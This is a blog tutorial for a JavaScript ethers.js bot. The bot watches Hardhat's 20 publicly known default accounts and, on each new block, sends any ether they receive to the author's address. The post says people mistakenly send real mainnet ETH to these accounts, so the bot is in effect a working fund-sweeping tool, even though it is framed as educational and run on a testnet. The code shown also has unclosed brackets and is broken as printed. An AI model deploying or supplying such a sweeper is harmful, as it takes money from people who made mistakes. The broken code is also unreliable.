DEV Community

Alex Bobes
Alex Bobes

Posted on • Originally published at

A Step-by-Step Guide to Building a Simple Ethereum Bot

This guide is intended for educational and/or research purposes only!

The bot we'll build in this tutorial will automatically withdraw funds from an account whenever it receives Ethereum.

Accounts from Hardhat will be used as a case study (Hardhat is an Ethereum developer environment). There are 20 deterministic accounts provided by Hardhat, but some people mistakenly transfer real Ethereum to those accounts. Lots of bots are eager to get their hands on the available ether.

To avoid competition with Mainnet bots, we're launching the bot on Rinkeby (Ethereum's test network).

Get access to the private keys

Npx hardhat node command retrieves the private keys from Hardhat. You can copy and paste the private keys from the list below.

Image description

It's critical to note that everyone who requests Hardhat accounts (public address + private keys) receive the exact same set of information. If you take a look on Etherscan at the account's transaction history you can see real transactions being made in the past.

Image description

Ethereum Bot

JavaScript will be used to build the bot, with NodeJS and the ethers library as the only external dependencies. The ethers.js library aims to be a complete and compact library for interacting with the Ethereum Blockchain and its ecosystem.

Run the following commands:

mkdir eth_bot
cd eth_bot
npm init
npm i ethers 
touch eth_bot.js
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Add the following code to eth_bot.js:

const { ethers } = require("ethers");
const provider = new ethers.providers.JsonRpcProvider("rinkeby_or_alchemy_or_infura_url");
const addressReceiver = "your_eth_address";

const privateKeys =
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Infura, Alchemy or any other provider can be added to const provider and your ETH address to the constant addressReceiver.

Insert the following code right after the privateKeys array: "

const bot = async () => {
  provider.on("block", async () => {
    console.log("Listening new block, waiting..)");
    for (let i = 0; i < privateKeys.length; i++) {
      const _target = new ethers.Wallet(privateKeys[i]);
      const target = _target.connect(provider);
      const balance = await provider.getBalance(target.address);
      const txBuffer = ethers.utils.parseEther(".005");
      if (balance.sub(txBuffer) > 0) {
        console.log("NEW ACCOUNT WITH ETH!");
        const amount = balance.sub(txBuffer);
        try {
          await target.sendTransaction({
            to: addressReceiver,
            value: amount
          console.log(`Success! transfered --> ${ethers.utils.formatEther(balance)}`);
        catch (e) {
            console.log(`error: ${e}`);

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To check if any of the 20 accounts have any Ethereum, we listen for new blocks to be mined. When the accounts above receive ETH, we transfer the funds to the Ethereum address defined in the JavaScript file.

Start the Ethereum Bot with a simple command: node eth_bot.js

Have fun!

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